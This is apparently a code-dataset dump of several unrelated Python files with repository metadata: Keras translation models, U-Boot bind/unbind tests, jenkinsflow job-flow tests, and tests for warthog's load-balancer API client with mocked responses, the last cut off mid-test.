model.compile(loss=sparse_categorical_crossentropy,
optimizer=Adam(learning_rate),
metrics=['accuracy'])
return model
def encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
"""
Build and train an encoder-decoder model on x and y
:param input_shape: Tuple of input shape
:param output_sequence_length: Length of output sequence
:param english_vocab_size: Number of unique English words in the dataset
:param french_vocab_size: Number of unique French words in the dataset
:return: Keras model built, but not trained
"""
# OPTIONAL: Implement
input_layer=InputLayer(input_shape[1:])
encoder_RNN=(GRU(64,return_sequences=False))
repeat_enc_representation = RepeatVector(output_sequence_length)
decoder_RNN=(GRU(64,return_sequences=True))
logits=TimeDistributed(Dense(french_vocab_size,activation='softmax'))
learning_rate=1e-3
model=Sequential()
model.add(input_layer)
model.add(encoder_RNN)
model.add(repeat_enc_representation)
model.add(decoder_RNN)
model.add(logits)
model.compile(loss=sparse_categorical_crossentropy,
optimizer=Adam(learning_rate),
metrics=['accuracy'])
return model
def model_final(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
"""
Build and train a model that incorporates embedding, encoder-decoder, and bidirectional RNN on x and y
:param input_shape: Tuple of input shape
:param output_sequence_length: Length of output sequence
:param english_vocab_size: Number of unique English words in the dataset
:param french_vocab_size: Number of unique French words in the dataset
:return: Keras model built, but not trained
"""
# Building the layers
embed_layer=Embedding(english_vocab_size,128,input_length=input_shape[1])
encoder_RNN=Bidirectional(GRU(256,return_sequences=False))
repeat_enc_representation = RepeatVector(output_sequence_length)
decoder_RNN=Bidirectional(GRU(256,return_sequences=True))
logits=TimeDistributed(Dense(french_vocab_size,activation='softmax'))
# TODO: Implement
learning_rate=0.005
model=Sequential()
model.add(embed_layer)
model.add(encoder_RNN)
model.add(repeat_enc_representation)
model.add(decoder_RNN)
model.add(logits)
model.compile(loss=sparse_categorical_crossentropy,
optimizer=Adam(learning_rate),
metrics=['accuracy'])
return model | 37.5 | 106 | 0.736132 | 797 | 6,075 | 5.406524 | 0.148055 | 0.056394 | 0.055697 | 0.039452 | 0.795544 | 0.78278 | 0.766071 | 0.766071 | 0.758413 | 0.758413 | 0 | 0.007924 | 0.189794 | 6,075 | 162 | 107 | 37.5 | 0.867534 | 0.316214 | 0 | 0.666667 | 0 | 0 | 0.018887 | 0 | 0 | 0 | 0 | 0.024691 | 0 | 1 | 0.055556 | false | 0 | 0.177778 | 0 | 0.288889 | 0.011111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
426fdc92c8d19b49eb9861fccc6aa194e2818cd2 | 238 | py | Python | pointnet3/__init__.py | LeiYangJustin/Map-in-a-Cycle | 52acac7bf31c0d3781c7ee6ecc3accc4d618f8c1 | [
"MIT"
] | 9 | 2020-09-15T06:36:50.000Z | 2021-09-08T11:13:06.000Z | pointnet3/__init__.py | LeiYangJustin/Map-in-a-Cycle | 52acac7bf31c0d3781c7ee6ecc3accc4d618f8c1 | [
"MIT"
] | null | null | null | pointnet3/__init__.py | LeiYangJustin/Map-in-a-Cycle | 52acac7bf31c0d3781c7ee6ecc3accc4d618f8c1 | [
"MIT"
] | 1 | 2021-09-02T22:46:46.000Z | 2021-09-02T22:46:46.000Z | from .arch.yanx27_pointnet import Pointnet2MSG_yanx27_vanilla
from .arch.sab_pointnet import Pointnet2MSG_yanx27_sab_partseg
from .segmentation_net.pointnet2_seg import Pointnet2MSG_yanx27_segmentation
from .loss.dve_loss import DVE_loss
| 47.6 | 76 | 0.89916 | 33 | 238 | 6.090909 | 0.454545 | 0.268657 | 0.358209 | 0.318408 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 0.067227 | 238 | 4 | 77 | 59.5 | 0.851351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
428c2933ea7c972e5999a794198eb0dbb535103e | 205 | py | Python | src/sage/categories/examples/coxeter_groups.py | bopopescu/sage | 2d495be78e0bdc7a0a635454290b27bb4f5f70f0 | [
"BSL-1.0"
] | 4 | 2020-07-17T04:49:44.000Z | 2020-07-29T06:33:51.000Z | src/sage/categories/examples/coxeter_groups.py | Ivo-Maffei/sage | 467fbc70a08b552b3de33d9065204ee9cbfb02c7 | [
"BSL-1.0"
] | 2 | 2018-10-30T13:40:20.000Z | 2020-07-23T12:13:30.000Z | src/sage/categories/examples/coxeter_groups.py | dimpase/sage | 468f23815ade42a2192b0a9cd378de8fdc594dcd | [
"BSL-1.0"
] | 7 | 2021-11-08T10:01:59.000Z | 2022-03-03T11:25:52.000Z | """
Examples of Coxeter groups
"""
from __future__ import absolute_import
# temporary until someone implements an appropriate example
from . import finite_weyl_groups
Example = finite_weyl_groups.Example
| 22.777778 | 59 | 0.82439 | 26 | 205 | 6.153846 | 0.653846 | 0.125 | 0.2 | 0.2875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126829 | 205 | 8 | 60 | 25.625 | 0.893855 | 0.414634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c48064afacc5ba559f0b7f05b796902d7a542f94 | 7,196 | py | Python | test/invoke_unchecked_test.py | velniukas/jenkinsflow | ca09c4044fc9da683b2233404e071fad506167b8 | [
"BSD-3-Clause"
] | 12 | 2015-03-05T14:57:58.000Z | 2021-03-30T09:22:04.000Z | test/invoke_unchecked_test.py | lhupfeldt/jenkinsflow | 0eda66ea4ac4ef9cd2e07149cc9a33f93a6c40b0 | [
"BSD-3-Clause"
] | 3 | 2015-02-23T04:32:11.000Z | 2016-03-06T11:51:04.000Z | test/invoke_unchecked_test.py | velniukas/jenkinsflow | ca09c4044fc9da683b2233404e071fad506167b8 | [
"BSD-3-Clause"
] | 4 | 2015-05-28T06:08:04.000Z | 2019-08-26T09:35:24.000Z | # Copyright (c) 2012 - 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from jenkinsflow.flow import serial, parallel
from .framework import api_select
def test_invoke_unchecked_dont_wait_serial(api_type):
with api_select.api(__file__, api_type, login=True) as api:
api.flow_job()
api.job('j11_slow_unchecked', max_fails=0, expect_invocations=1, expect_order=1, exec_time=100, unknown_result=True)
api.job('j12', max_fails=0, expect_invocations=1, expect_order=2)
with serial(api, timeout=50, job_name_prefix=api.job_name_prefix, report_interval=1) as ctrl1:
ctrl1.invoke_unchecked('j11_slow_unchecked')
ctrl1.invoke('j12')
def test_invoke_unchecked_dont_wait_parallel(api_type):
with api_select.api(__file__, api_type, login=True) as api:
api.flow_job()
api.job('j11_slow_unchecked', max_fails=0, expect_invocations=1, expect_order=1, exec_time=100, unknown_result=True)
api.job('j12', max_fails=0, expect_invocations=1, expect_order=2, exec_time=5)
with parallel(api, timeout=50, job_name_prefix=api.job_name_prefix, report_interval=1) as ctrl1:
ctrl1.invoke_unchecked('j11_slow_unchecked')
ctrl1.invoke('j12')
def test_invoke_unchecked_serial(api_type):
with api_select.api(__file__, api_type, login=True) as api:
api.job('j11_unchecked', max_fails=0, expect_invocations=1, expect_order=None, exec_time=30, unknown_result=True)
api.job('j12', max_fails=0, expect_invocations=1, expect_order=1, exec_time=5)
api.job('j13_unchecked', max_fails=0, expect_invocations=1, expect_order=2, exec_time=30, invocation_delay=0, unknown_result=True)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=1) as ctrl1:
ctrl1.invoke_unchecked('j11_unchecked')
ctrl1.invoke('j12')
ctrl1.invoke_unchecked('j13_unchecked')
def test_invoke_unchecked_parallel(api_type):
with api_select.api(__file__, api_type, login=True) as api:
api.job('j11_unchecked', max_fails=0, expect_invocations=1, expect_order=None, exec_time=30, unknown_result=True)
api.job('j12', max_fails=0, expect_invocations=1, expect_order=1, exec_time=5)
api.job('j13_unchecked', max_fails=0, expect_invocations=1, expect_order=1)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=1) as ctrl1:
ctrl1.invoke_unchecked('j11_unchecked')
ctrl1.invoke('j12')
ctrl1.invoke_unchecked('j13_unchecked')
def test_invoke_unchecked_serial_fails(api_type):
with api_select.api(__file__, api_type, login=True) as api:
api.job('j11_unchecked', max_fails=0, expect_invocations=1, expect_order=None, exec_time=30, unknown_result=True)
api.job('j12', max_fails=0, expect_invocations=1, expect_order=1)
api.job('j13_fail_unchecked', max_fails=1, expect_invocations=1, expect_order=2)
api.job('j14', max_fails=0, expect_invocations=1, expect_order=2, exec_time=5)
api.job('j15_unchecked', max_fails=0, expect_invocations=1, expect_order=None, exec_time=30, unknown_result=True)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=1) as ctrl1:
ctrl1.invoke_unchecked('j11_unchecked')
ctrl1.invoke('j12')
ctrl1.invoke_unchecked('j13_fail_unchecked')
ctrl1.invoke('j14')
ctrl1.invoke_unchecked('j15_unchecked')
def test_invoke_unchecked_parallel_fails(api_type):
with api_select.api(__file__, api_type, login=True) as api:
api.job('j11_unchecked', max_fails=0, expect_invocations=1, expect_order=None, exec_time=30, unknown_result=True)
api.job('j12', max_fails=0, expect_invocations=1, expect_order=1)
api.job('j13_fail_unchecked', max_fails=1, expect_invocations=1, expect_order=1)
api.job('j14', max_fails=0, expect_invocations=1, expect_order=1, exec_time=5)
api.job('j15_unchecked', max_fails=0, expect_invocations=1, expect_order=1)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=1) as ctrl1:
ctrl1.invoke_unchecked('j11_unchecked')
ctrl1.invoke('j12')
ctrl1.invoke_unchecked('j13_fail_unchecked')
ctrl1.invoke('j14')
ctrl1.invoke_unchecked('j15_unchecked')
def test_invoke_unchecked_mix_fails(api_type):
with api_select.api(__file__, api_type, login=True) as api:
api.flow_job()
api.job('j11_unchecked', max_fails=0, expect_invocations=1, expect_order=None)
api.job('j12', max_fails=0, expect_invocations=1, expect_order=2)
api.job('j31', max_fails=0, expect_invocations=1, expect_order=3)
# Make sure result is available during first invocation of _check, only way to hit error handling code in unchecked job
vfast = 0.00000000000000000000000000000000001
api.job('j32_fail_unchecked', max_fails=1, expect_invocations=1, expect_order=3, exec_time=vfast, invocation_delay=0)
api.job('j33_slow_unchecked', max_fails=0, expect_invocations=1, expect_order=None, exec_time=100, unknown_result=True)
api.job('j34', max_fails=0, expect_invocations=1, expect_order=3, exec_time=5)
api.job('j35_fail_unchecked', max_fails=1, expect_invocations=1, expect_order=3)
api.job('j13', max_fails=0, expect_invocations=1, expect_order=4)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=1) as ctrl1:
ctrl1.invoke_unchecked('j11_unchecked')
ctrl1.invoke('j12')
with ctrl1.parallel(timeout=40, report_interval=3) as ctrl2:
with ctrl2.serial(timeout=40, report_interval=3) as ctrl3a:
ctrl3a.invoke('j31')
ctrl3a.invoke_unchecked('j32_fail_unchecked')
with ctrl2.parallel(timeout=40, report_interval=3) as ctrl3b:
ctrl3b.invoke_unchecked('j33_slow_unchecked')
ctrl3b.invoke('j34')
ctrl3b.invoke_unchecked('j35_fail_unchecked')
ctrl1.invoke('j13')
def test_invoke_unchecked_mix_no_fails(api_type):
with api_select.api(__file__, api_type, login=True) as api:
api.job('j31_unchecked', max_fails=0, expect_invocations=1, expect_order=1, exec_time=30, unknown_result=True)
api.job('j32_unchecked', max_fails=0, expect_invocations=1, expect_order=1, exec_time=30, unknown_result=True)
api.job('j11', max_fails=0, expect_invocations=1, expect_order=2)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=1) as ctrl1:
with ctrl1.parallel(timeout=40, report_interval=3) as ctrl2:
with ctrl2.serial(timeout=40, report_interval=3) as ctrl3a:
ctrl3a.invoke_unchecked('j31_unchecked')
with ctrl2.parallel(timeout=40, report_interval=3) as ctrl3b:
ctrl3b.invoke_unchecked('j32_unchecked')
ctrl1.invoke('j11')
| 54.515152 | 138 | 0.706504 | 1,040 | 7,196 | 4.569231 | 0.100962 | 0.049242 | 0.117424 | 0.156566 | 0.882786 | 0.874158 | 0.864478 | 0.864478 | 0.84596 | 0.829545 | 0 | 0.064736 | 0.184269 | 7,196 | 131 | 139 | 54.931298 | 0.744804 | 0.034742 | 0 | 0.581633 | 0 | 0 | 0.088735 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081633 | false | 0 | 0.020408 | 0 | 0.102041 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6703325c0b7684df168bf13f8d7611d76b74d472 | 7,323 | py | Python | machine/qemu/sources/u-boot/test/py/tests/test_bind.py | muddessir/framework | 5b802b2dd7ec9778794b078e748dd1f989547265 | [
"MIT"
] | 1 | 2021-11-21T19:56:29.000Z | 2021-11-21T19:56:29.000Z | machine/qemu/sources/u-boot/test/py/tests/test_bind.py | muddessir/framework | 5b802b2dd7ec9778794b078e748dd1f989547265 | [
"MIT"
] | null | null | null | machine/qemu/sources/u-boot/test/py/tests/test_bind.py | muddessir/framework | 5b802b2dd7ec9778794b078e748dd1f989547265 | [
"MIT"
] | null | null | null | # SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
import os.path
import pytest
import re
def in_tree(response, name, uclass, drv, depth, last_child):
lines = [x.strip() for x in response.splitlines()]
leaf = ''
if depth != 0:
leaf = ' ' + ' ' * (depth - 1) ;
if not last_child:
leaf = leaf + r'\|'
else:
leaf = leaf + '`'
leaf = leaf + '-- ' + name
line = (r' *{:10.10} *[0-9]* \[ [ +] \] {:20.20} [` |]{}$'
.format(uclass, drv, leaf))
prog = re.compile(line)
for l in lines:
if prog.match(l):
return True
return False
@pytest.mark.buildconfigspec('cmd_bind')
def test_bind_unbind_with_node(u_boot_console):
tree = u_boot_console.run_command('dm tree')
assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True)
assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False)
assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True)
#Unbind child #1. No error expected and all devices should be there except for bind-test-child1
response = u_boot_console.run_command('unbind /bind-test/bind-test-child1')
assert response == ''
tree = u_boot_console.run_command('dm tree')
assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True)
assert 'bind-test-child1' not in tree
assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True)
#bind child #1. No error expected and all devices should be there
response = u_boot_console.run_command('bind /bind-test/bind-test-child1 phy_sandbox')
assert response == ''
tree = u_boot_console.run_command('dm tree')
assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True)
assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True)
assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, False)
#Unbind child #2. No error expected and all devices should be there except for bind-test-child2
response = u_boot_console.run_command('unbind /bind-test/bind-test-child2')
assert response == ''
tree = u_boot_console.run_command('dm tree')
assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True)
assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True)
assert 'bind-test-child2' not in tree
#Bind child #2. No error expected and all devices should be there
response = u_boot_console.run_command('bind /bind-test/bind-test-child2 simple_bus')
assert response == ''
tree = u_boot_console.run_command('dm tree')
assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True)
assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False)
assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True)
#Unbind parent. No error expected. All devices should be removed and unbound
response = u_boot_console.run_command('unbind /bind-test')
assert response == ''
tree = u_boot_console.run_command('dm tree')
assert 'bind-test' not in tree
assert 'bind-test-child1' not in tree
assert 'bind-test-child2' not in tree
#try binding invalid node with valid driver
response = u_boot_console.run_command('bind /not-a-valid-node simple_bus')
assert response != ''
tree = u_boot_console.run_command('dm tree')
assert 'not-a-valid-node' not in tree
#try binding valid node with invalid driver
response = u_boot_console.run_command('bind /bind-test not_a_driver')
assert response != ''
tree = u_boot_console.run_command('dm tree')
assert 'bind-test' not in tree
#bind /bind-test. Device should come up as well as its children
response = u_boot_console.run_command('bind /bind-test simple_bus')
assert response == ''
tree = u_boot_console.run_command('dm tree')
assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True)
assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False)
assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True)
response = u_boot_console.run_command('unbind /bind-test')
assert response == ''
def get_next_line(tree, name):
treelines = [x.strip() for x in tree.splitlines() if x.strip()]
child_line = ''
for idx, line in enumerate(treelines):
if ('-- ' + name) in line:
try:
child_line = treelines[idx+1]
except:
pass
break
return child_line
@pytest.mark.buildconfigspec('cmd_bind')
def test_bind_unbind_with_uclass(u_boot_console):
#bind /bind-test
response = u_boot_console.run_command('bind /bind-test simple_bus')
assert response == ''
#make sure bind-test-child2 is there and get its uclass/index pair
tree = u_boot_console.run_command('dm tree')
child2_line = [x.strip() for x in tree.splitlines() if '-- bind-test-child2' in x]
assert len(child2_line) == 1
child2_uclass = child2_line[0].split()[0]
child2_index = int(child2_line[0].split()[1])
#bind simple_bus as a child of bind-test-child2
response = u_boot_console.run_command('bind {} {} simple_bus'.format(child2_uclass, child2_index, 'simple_bus'))
#check that the child is there and its uclass/index pair is right
tree = u_boot_console.run_command('dm tree')
child_of_child2_line = get_next_line(tree, 'bind-test-child2')
assert child_of_child2_line
child_of_child2_index = int(child_of_child2_line.split()[1])
assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True)
assert child_of_child2_index == child2_index + 1
#unbind the child and check it has been removed
response = u_boot_console.run_command('unbind simple_bus {}'.format(child_of_child2_index))
assert response == ''
tree = u_boot_console.run_command('dm tree')
assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True)
assert not in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True)
child_of_child2_line = get_next_line(tree, 'bind-test-child2')
assert child_of_child2_line == ''
#bind simple_bus as a child of bind-test-child2
response = u_boot_console.run_command('bind {} {} simple_bus'.format(child2_uclass, child2_index, 'simple_bus'))
#check that the child is there and its uclass/index pair is right
tree = u_boot_console.run_command('dm tree')
treelines = [x.strip() for x in tree.splitlines() if x.strip()]
child_of_child2_line = get_next_line(tree, 'bind-test-child2')
assert child_of_child2_line
child_of_child2_index = int(child_of_child2_line.split()[1])
assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True)
assert child_of_child2_index == child2_index + 1
#unbind the child and check it has been removed
response = u_boot_console.run_command('unbind {} {} simple_bus'.format(child2_uclass, child2_index, 'simple_bus'))
assert response == ''
tree = u_boot_console.run_command('dm tree')
assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True)
child_of_child2_line = get_next_line(tree, 'bind-test-child2')
assert child_of_child2_line == ''
#unbind the child again and check it doesn't change the tree
tree_old = u_boot_console.run_command('dm tree')
response = u_boot_console.run_command('unbind {} {} simple_bus'.format(child2_uclass, child2_index, 'simple_bus'))
tree_new = u_boot_console.run_command('dm tree')
assert response == ''
assert tree_old == tree_new
response = u_boot_console.run_command('unbind /bind-test')
assert response == ''
| 40.683333 | 116 | 0.72402 | 1,167 | 7,323 | 4.311911 | 0.108826 | 0.079491 | 0.081081 | 0.09539 | 0.801471 | 0.788553 | 0.788553 | 0.773847 | 0.735294 | 0.725755 | 0 | 0.01811 | 0.14038 | 7,323 | 179 | 117 | 40.910615 | 0.781255 | 0.147071 | 0 | 0.614173 | 0 | 0.007874 | 0.244937 | 0.017358 | 0.007874 | 0 | 0 | 0 | 0.393701 | 1 | 0.031496 | false | 0.007874 | 0.023622 | 0 | 0.07874 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
677b982aefe8fb0556ac74b5d5a8f8210894181c | 44 | py | Python | iotrans/__init__.py | open-data-toronto/iotrans | 3f05a4aaa5971c12ffd1574c078fddc91b25326f | [
"MIT"
] | null | null | null | iotrans/__init__.py | open-data-toronto/iotrans | 3f05a4aaa5971c12ffd1574c078fddc91b25326f | [
"MIT"
] | null | null | null | iotrans/__init__.py | open-data-toronto/iotrans | 3f05a4aaa5971c12ffd1574c078fddc91b25326f | [
"MIT"
] | null | null | null | from .out import to_file, supported_formats
| 22 | 43 | 0.840909 | 7 | 44 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113636 | 44 | 1 | 44 | 44 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
67848606483a38cd710cefac281d879251e21a0c | 19,045 | py | Python | test/test_core.py | smarter-travel-media/warthog | 568b73c78465eb0338329be256b1b86c98cdbcd9 | [
"MIT"
] | 1 | 2015-03-10T14:37:53.000Z | 2015-03-10T14:37:53.000Z | test/test_core.py | smarter-travel-media/warthog | 568b73c78465eb0338329be256b1b86c98cdbcd9 | [
"MIT"
] | 13 | 2015-07-31T14:27:23.000Z | 2017-06-29T18:37:18.000Z | test/test_core.py | smarter-travel-media/warthog | 568b73c78465eb0338329be256b1b86c98cdbcd9 | [
"MIT"
] | 1 | 2017-06-29T08:17:03.000Z | 2017-06-29T08:17:03.000Z | # -*- coding: utf-8 -*-
import mock
import pytest
import requests
import warthog.core
import warthog.exceptions
SOME_CRAZY_ERROR = {
'response': {
'status': 'fail',
'err': {
'code': 10001,
'msg': 'You done did it now'
}
}
}
AUTH_SUCCESS = {
"authresponse": {
"signature": "ad44c3dfbac9440da876e7b3feaf1fc",
"description": "the signature should be set in Authorization header for following request."
}
}
BAD_PW = {
"authorizationschema": {
"code": 403,
"error": "Incorrect user name or password",
"auth_uri": "/axapi/v3/auth",
"logoff_uri": "/axapi/v3/logoff",
"username": "required",
"password": "required"
}
}
INVALID_SESSION = {
"authorizationschema": {
"code": 401,
"error": "Invalid admin session.",
"auth_uri": "/axapi/v3/auth",
"logoff_uri": "/axapi/v3/logoff",
"username": "required",
"password": "required"
}
}
NO_PERMISSIONS = {
"response": {
"status": "fail",
"err": {
"code": 419545856,
"from": "BACKEND",
"msg": "No write privilege of this admin session."
}
}
}
NO_SUCH_SERVER = {
"response": {
"status": "fail",
"err": {
"code": 1023460352,
"from": "CM",
"msg": "Object specified does not exist (object: server)"
}
}
}
OK_RESPONSE = {
'response': {
'status': 'OK'
}
}
NODE_OPER = {
"server": {
"oper": {
"state": "Up"
},
"port-list": [
{
"oper": {
"state": "Up"
},
"a10-url": "/axapi/v3/slb/server/app1.example.com/port/80+tcp/oper",
"port-number": 80,
"protocol": "tcp"
}
],
"a10-url": "/axapi/v3/slb/server/app1.example.com/oper",
"name": "app1.example.com"
}
}
NODE_STATS = {
"server": {
"stats": {
"curr-conn": 0,
"total-conn": 0,
"fwd-pkt": 0,
"rev-pkt": 0,
"peak-conn": 0,
"total_req": 0,
"total_req_succ": 0,
"curr_ssl_conn": 0,
"total_ssl_conn": 0,
"total_fwd_bytes": 0,
"total_rev_bytes": 0
},
"port-list": [
{
"stats": {
"curr_conn": 0,
"curr_req": 0,
"total_req": 0,
"total_req_succ": 0,
"total_fwd_bytes": 0,
"total_fwd_pkts": 0,
"total_rev_bytes": 0,
"total_rev_pkts": 0,
"total_conn": 0,
"last_total_conn": 0,
"peak_conn": 0,
"es_resp_200": 0,
"es_resp_300": 0,
"es_resp_400": 0,
"es_resp_500": 0,
"es_resp_other": 0,
"es_req_count": 0,
"es_resp_count": 0,
"es_resp_invalid_http": 0,
"total_rev_pkts_inspected": 0,
"total_rev_pkts_inspected_good_status_code": 0,
"response_time": 0,
"fastest_rsp_time": 0,
"slowest_rsp_time": 0,
"curr_ssl_conn": 0,
"total_ssl_conn": 0
},
"a10-url": "/axapi/v3/slb/server/app1.example.com/port/80+tcp/stats",
"port-number": 80,
"protocol": "tcp"
}
],
"a10-url": "/axapi/v3/slb/server/app1.example.com/stats",
"name": "app1.example.com"
}
}
NODE_ALTER = {
"server": {
"name": "app1.example.com",
"host": "10.0.0.1",
"action": "enable",
"template-server": "default",
"health-check-disable": 0,
"conn-limit": 8000000,
"no-logging": 0,
"weight": 1,
"slow-start": 0,
"spoofing-cache": 0,
"stats-data-action": "stats-data-enable",
"extended-stats": 0,
"uuid": "7bdeee5c-56f0-44b5-a040-243a389f6fd1",
"port-list": [
{
"port-number": 80,
"protocol": "tcp",
"range": 0,
"template-port": "default",
"action": "enable",
"no-ssl": 0,
"health-check-disable": 0,
"weight": 1,
"conn-limit": 8000000,
"no-logging": 0,
"stats-data-action": "stats-data-enable",
"extended-stats": 0,
"uuid": "7bdeee5c-56f0-44b5-a040-243a389f6fd1",
"a10-url": "/axapi/v3/slb/server/app1.example.com/port/80+tcp"
}
]
}
}
SCHEME_HOST = 'https://lb.example.com'
@pytest.fixture
def response():
return mock.Mock(spec=requests.Response)
@pytest.fixture
def transport(response):
mock_transport = mock.Mock(spec=requests.Session)
mock_transport.get.return_value = response
mock_transport.post.return_value = response
return mock_transport
class TestSessionStartCommand(object):
def test_send_bad_password(self, transport, response):
response.text = ''
response.status_code = 403
response.ok = False
response.json.return_value = dict(BAD_PW)
with pytest.raises(warthog.exceptions.WarthogAuthFailureError):
cmd = warthog.core.SessionStartCommand(transport, SCHEME_HOST, 'user', 'bad password')
cmd.send()
assert transport.post.called, 'Expected transport ".post()" to be called'
def test_send_success(self, transport, response):
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = dict(AUTH_SUCCESS)
cmd = warthog.core.SessionStartCommand(transport, SCHEME_HOST, 'user', 'password')
session = cmd.send()
assert 'ad44c3dfbac9440da876e7b3feaf1fc' == session, 'Did not get expected session ID'
class TestSessionEndCommand(object):
def test_send_invalid_session(self, transport, response):
response.text = ''
response.status_code = 401
response.ok = False
response.json.return_value = dict(INVALID_SESSION)
with pytest.raises(warthog.exceptions.WarthogInvalidSessionError):
cmd = warthog.core.SessionEndCommand(transport, SCHEME_HOST, 'bad session')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_unknown_error(self, transport, response):
response.text = ''
response.status_code = 503
response.ok = False
response.json.return_value = dict(SOME_CRAZY_ERROR)
with pytest.raises(warthog.exceptions.WarthogApiError):
cmd = warthog.core.SessionEndCommand(transport, SCHEME_HOST, '1234')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_success(self, transport, response):
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = dict(OK_RESPONSE)
cmd = warthog.core.SessionEndCommand(transport, SCHEME_HOST, '1234')
closed = cmd.send()
assert closed, 'Did not get expected True result from session close'
assert transport.post.called, 'Expected transport ".post() to be called'
class TestNodeEnableCommand(object):
def test_send_invalid_session(self, transport, response):
response.text = ''
response.status_code = 401
response.ok = False
response.json.return_value = dict(INVALID_SESSION)
with pytest.raises(warthog.exceptions.WarthogInvalidSessionError):
cmd = warthog.core.NodeEnableCommand(
transport, SCHEME_HOST, '1234', 'bad.example.com')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_no_such_server(self, transport, response):
response.text = ''
response.status_code = 404
response.ok = False
response.json.return_value = dict(NO_SUCH_SERVER)
with pytest.raises(warthog.exceptions.WarthogNoSuchNodeError):
cmd = warthog.core.NodeEnableCommand(
transport, SCHEME_HOST, '1234', 'bad.example.com')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_no_permissions(self, transport, response):
response.text = ''
response.status_code = 400
response.ok = False
response.json.return_value = dict(NO_PERMISSIONS)
with pytest.raises(warthog.exceptions.WarthogPermissionError):
cmd = warthog.core.NodeDisableCommand(
transport, SCHEME_HOST, '1234', 'app1.example.com')
